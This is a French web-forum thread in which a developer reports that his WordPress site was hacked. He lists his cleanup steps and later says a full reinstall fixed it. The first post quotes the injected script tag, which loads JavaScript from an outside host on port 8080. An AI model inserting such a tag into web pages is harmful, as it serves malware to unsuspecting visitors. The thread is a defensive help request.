IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Code malveillant inséré dans fichiers sources


Sujet :

Sécurité

  1. #1
    Membre du Club
    Profil pro
    Développeur C#, Python, dans la carte à puce
    Inscrit en
    Mars 2009
    Messages
    46
    Détails du profil
    Informations personnelles :
    Âge : 37
    Localisation : France

    Informations professionnelles :
    Activité : Développeur C#, Python, dans la carte à puce
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Mars 2009
    Messages : 46
    Points : 49
    Points
    49
    Par défaut Code malveillant inséré dans fichiers sources
    Bonjour,

    J'ai un problème sur un site que je maintiens.
    Depuis environ deux semaines, le site est détecté (à juste titre !) comme malveillant par Google entres autres. Après rapide examen des fichiers sources, je découvre ce genre de choses :

    <script type="text/javascript" src="http://dolgo.lulucabana.com:8080/Link.js"></script>
    <!--64a579ec00106a9f73d97a87b99c7f8e-->

    Et d'autres scripts peu réjouissant.

    Le site est hébergé chez zone-vip qui utilise comme outil de gestion de l'hébergement cPanel, et est un site wordpress.

    Ce que j'ai fait :
    - Changement du mot de passe zone-vip (un même mot de passe apparemment pour le compte zone-vip, l'accès au ftp et l'accès au phpmyadmin... impossible de changer cela)
    - Suppression totale du site, et réinstallation d'un wordpress mis à jour. J'ai gardé la base et les données, je ne vois pas ce qu'elle contient qui peut causer ces problèmes).

    Bref, je pensais que c'était bon, mais visiblement non... Les mêmes problèmes sont revenus : site bloqué par Google et insertion de ces quelques lignes de code dans mes sources.

    Je ne sais pas quoi faire de plus, je reste perplexe...
    Avez-vous quelques idées, suggestions ?

    Lien vers le site :
    http://www.itineraire-bis.org/
    (Actuellement, j'ai modifié le .htaccess pour rediriger vers notre forum)

  2. #2
    Membre du Club
    Profil pro
    Développeur C#, Python, dans la carte à puce
    Inscrit en
    Mars 2009
    Messages
    46
    Détails du profil
    Informations personnelles :
    Âge : 37
    Localisation : France

    Informations professionnelles :
    Activité : Développeur C#, Python, dans la carte à puce
    Secteur : High Tech - Éditeur de logiciels

    Informations forums :
    Inscription : Mars 2009
    Messages : 46
    Points : 49
    Points
    49
    Par défaut
    Bon, ça a l'air réglé. J'ai vraiment tout supprimé (base de données, utilisateurs, différents plugins), réinstallé un wordpress à jour sain, installé la dernière version du thème, remis juste les plugins que j'utilise.
    J'ai réinséré à la main les données en base pour ne pas tout réinséré (notamment les utilisateurs), sécuriser comme il faut les répertoires de mon site par .htaccess.

    Tout semble rentré dans l'ordre, je ne sais toujours pas où se situait la faille.

+ Répondre à la discussion
Cette discussion est résolue.

Discussions similaires

  1. Modifier une ligne dans fichier source
    Par rFlex dans le forum Eclipse Platform
    Réponses: 1
    Dernier message: 30/11/2011, 18h46
  2. exécuter du code php inséré dans une chaine
    Par hat_et_m dans le forum Langage
    Réponses: 11
    Dernier message: 11/03/2011, 15h31
  3. attaque logiciel malveillant javascript dans fichier
    Par nouni600 dans le forum Sécurité
    Réponses: 4
    Dernier message: 25/02/2011, 23h47
  4. Site piraté : code html inséré dans ma page
    Par teraDev dans le forum Sécurité
    Réponses: 24
    Dernier message: 27/05/2009, 19h21
  5. Php à la volée : le code est visible dans le source !
    Par renaud26 dans le forum Langage
    Réponses: 12
    Dernier message: 29/04/2009, 10h30

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo